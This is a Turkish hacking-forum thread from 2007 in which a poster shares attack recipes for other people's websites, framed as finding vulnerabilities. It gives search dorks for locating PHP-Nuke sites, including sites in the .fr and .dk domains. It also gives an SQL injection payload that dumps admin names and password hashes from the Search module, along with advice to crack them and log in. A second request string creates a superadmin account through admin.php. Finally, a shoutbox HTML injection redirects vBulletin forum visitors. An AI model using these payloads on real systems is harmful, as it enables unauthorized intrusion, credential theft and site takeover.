THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

açık bulma

gokhanjan - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2006
Mesajlar:
47
Konular:
11
Teşekkür (Etti):
0
Teşekkür (Aldı):
9
Ticaret:
(0) %
09-01-2007 13:02
#1
Thumbs down
açık bulma
Php Nukedeki search modulunden dogan sql injection [hash cekme ] acıgı ..
adım 1 - ilk önce www.altavista.com a giriyoruz ondan sonra şunu aratıyoruz
PHP-Nuke Copyright © 2004 by Francisco Burzi
arama olayı için şu önemli bence googleyi kullanmayın altavista daha iyi sonuç verir ve mesela altavistada aratıyosunuz örneğin şöyle aratın :
PHP-Nuke Copyright © 2004 by Francisco Burzi aşk
aratma kodunun yanına her hangi bir konuyu yazın ehee daha güzel sonuca ulaşırsınız
2-evet şimdi bi siteye girdik sitenin search bölümü aktif olmalı değilse fıss
sitenin adresinin sonuna şunu ekleyin örnek : www.hedef.com/modules.php?name=Search
sonra orda şu kodu aratın :
p0gg0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
karşınıza admin nickleri ve hashler gelecek resimdeki gibi : https://tik.lat/04EZA
bunu da www.milw0rm.com da kırın ve admin.php den gırıp hackleyın
-------------------------------------------------------------------------
2.bır acık eskı ama yapın
arama: powered by php-nuke site:.fr
yada site:.dk cogaltabılırsınız acıkları usttekıde kullanılabılır
arama2: inurl://modules.php?name=search site:.fr yazıp aradıktan sonra modules.php?name=Search silip admin.php yazıyoruz daha sonra su kodu eklıyoruz

[EMAIL="?add_aid=Blue_Devil&add_name=God&add_pwd=12 3456789&add_email=sallama@email.com&admin=eCcgVU5J T04gU0VMRUNUIDEvKjox&add_radminsuper=1&op=AddAutho r&Submit=ADMIN+YAP [URL="https://tik.lat/ckggE"] http://spirit31.sitemynet.com/operayontemi/1.jpg[/URL]
http://spirit31.sitemynet.com/operayontemi/2.jpg
http://spirit31.sitemynet.com/operayontemi/3.jpg
http://spirit31.sitemynet.com/operayontemi/4.jpg
http://spirit31.sitemynet.com/operayontemi/5.jpg
http://spirit31.sitemynet.com/operayontemi/6.jph
http://spirit31.sitemynet.com/operayontemi/7.jpg
--------------------------------------------------------------------------------------------
Shoutbox bilindiği gibi vbulletinlerde(başka portalada oluyormu bilmiyorum) kuruluyor ve site içi chat yapmaya yarıyor.Ben bu açığı daha önce türk sitelerinde görmedim ama belki eski bir açık olabilir genede paylaşayım dedim.

Şimdi Yapmanız gereken şey şu Shoutbox kurulu bir site buluyor üye oluyorsunuz ve chat kısmına şu kodu yazıyorsunuz

Kod:
<pre a=’>’ ***********=’********.********="
http://www.yönlenecekadres.com?c=[/URL] b=’</pre’ >
Bu kodu yazarsanız forum yönlenir ama biraz geç yönleniyor ama yönleniyor bazı sitelerde işte yaramıyor kod ortaya çıkıyor.
Google ’’ /vbshout.php?do=archive ’’ şeklinde aratırsanız bulursunuz.
<html kodlarının açık olması gerekmektedir>

--------------------------------------------------------------------------------------------
ALINTIDIR...
selimgencer - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2006
Mesajlar:
66
Konular:
1
Teşekkür (Etti):
17
Teşekkür (Aldı):
3
Ticaret:
(0) %
26-10-2009 22:40
#2
saol ustad

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler